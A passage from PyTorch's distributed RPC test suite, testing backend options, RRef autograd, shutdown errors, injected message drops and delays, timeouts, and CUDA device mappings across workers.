world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
